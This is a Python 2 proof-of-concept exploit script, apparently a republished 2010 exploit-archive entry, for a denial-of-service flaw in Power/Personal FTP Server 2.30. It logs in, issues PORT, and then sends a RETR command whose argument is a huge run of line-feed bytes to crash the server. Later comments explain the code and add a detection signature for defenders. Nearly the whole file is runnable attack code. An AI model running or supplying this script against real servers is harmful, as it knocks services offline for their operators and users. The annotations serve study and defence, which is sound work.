#!/usr/bin/python
#--------------------------------------------
# Power/Personal FTP Server RETR Command DoS
#--------------------------------------------
# Title: Power/Personal FTP Server RETR Command DoS
# Author: antrhacks
# Software Link: http://www.cooolsoft.com/download/PowerFTP.EXE
# Version: 2.30
# Platform:Windows XP SP3 Home edition Fr
# Tested with buffersize: 82000, 83000, 84000, ... 92000
# Example: ./PowerFTP.py 192.168.0.10 test test 85000
#
# Proof-of-concept as published: logs in to an FTP server, announces a
# data port with PORT, then sends a RETR whose argument is an oversized
# run of line-feed bytes ("\x0a\x0a" * buffersize, i.e. 2 * buffersize
# bytes). Written for Python 2: `print r` is the statement form and
# `<>` is the old inequality operator, so this file does not parse on
# Python 3.
#
# Defender notes: the trigger is entirely on the FTP control channel
# (TCP/21) -- a RETR with an argument of 160 KB+ is far outside any
# sane filename length and is a clear signature for protocol-aware
# inspection or control-channel line-length limits on the server side.
# Only the DoS outcome is claimed in the header; nothing on this page
# shows any further impact.

import socket
import sys

# Description:
# RETR command overflow with PORT specified

def howto():
    # Print the command-line usage string; called when the argument
    # count is wrong (see the `__main__`-style block at the bottom).
    print ("Usage: scriptname.py <IP> <username> <password> <buffersize>\n")

def exploit(host,user,password):
    # Run the FTP exchange against `host`:21 and send the oversized RETR.
    #
    # Args:
    #     host: FTP server address passed to socket.connect().
    #     user, password: sent verbatim in USER / PASS commands.
    #
    # Reads the module-level global `buffer` (assigned in the bottom
    # block from argv[4]); calling exploit() before that assignment
    # raises NameError. Note `buffer` also shadows the Python 2 builtin
    # of the same name. Returns None; exits the process with status 1
    # on connection failure.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Bind the control socket to local port 6666 so the hard-coded PORT
    # argument below (…,26,10 == 6666) refers to a port this process
    # owns. Note the PORT host part (192,168,0,11) is a literal, not
    # derived from getsockname(); the local address is only printed.
    sock.bind(('0.0.0.0', 6666)) # Need that for the PORT Command !!!
    try:
        sock.connect((host, 21))
    except:
        # Bare except: also swallows KeyboardInterrupt/SystemExit and
        # hides the real socket error; the socket is never closed on
        # this path.
        print ("Unable to connect to host")
        sys.exit(1)
    # Every recv(1024) below reads at most 1024 bytes of the server's
    # reply and is echoed for the operator; a reply split across TCP
    # segments is not reassembled, so the printed text may be partial.
    r=sock.recv(1024)
    print r
    r=sock.getsockname()
    print r
    sock.send("USER " + user + "\r\n")
    r=sock.recv(1024)
    print r
    sock.send("PASS " + password + "\r\n")
    r=sock.recv(1024)
    print r
    # 26,10 => 0x1a,0x0a => 6666: the PORT command encodes the data port
    # as two decimal bytes, high byte first (26 * 256 + 10 == 6666).
    sock.send("PORT 192,168,0,11,26,10" + "\r\n") # 26,10 => 0x1a,0x0a => 6666
    r=sock.recv(1024)
    print r
    # The oversized RETR argument; `buffer` is 2 * buffersize bytes of
    # 0x0a. send() is not guaranteed to transmit the whole string in one
    # call (sendall() would be), and the return value is ignored.
    sock.send("RETR " + buffer + " \r\n")
    r=sock.recv(1024)
    print r
    sock.send("QUIT" + " \r\n")
    r=sock.recv(1024)
    print r
    sock.close()

# Entry point: exactly four positional arguments are required
# (<IP> <username> <password> <buffersize>). A non-numeric buffersize
# raises an uncaught ValueError from int().
if len(sys.argv) <> 5:
    howto()
    sys.exit(1)
else:
    host=sys.argv[1]
    user=sys.argv[2]
    password=sys.argv[3]
    buffersize=int(sys.argv[4])
    # Module global consumed by exploit(); defined here, after the
    # function, so it is only in scope once this branch has run.
    buffer="\x0a\x0a" * buffersize
    exploit(host,user,password)
    sys.exit(0)

# END
# (2010-07-15) - Inj3ct0r.com -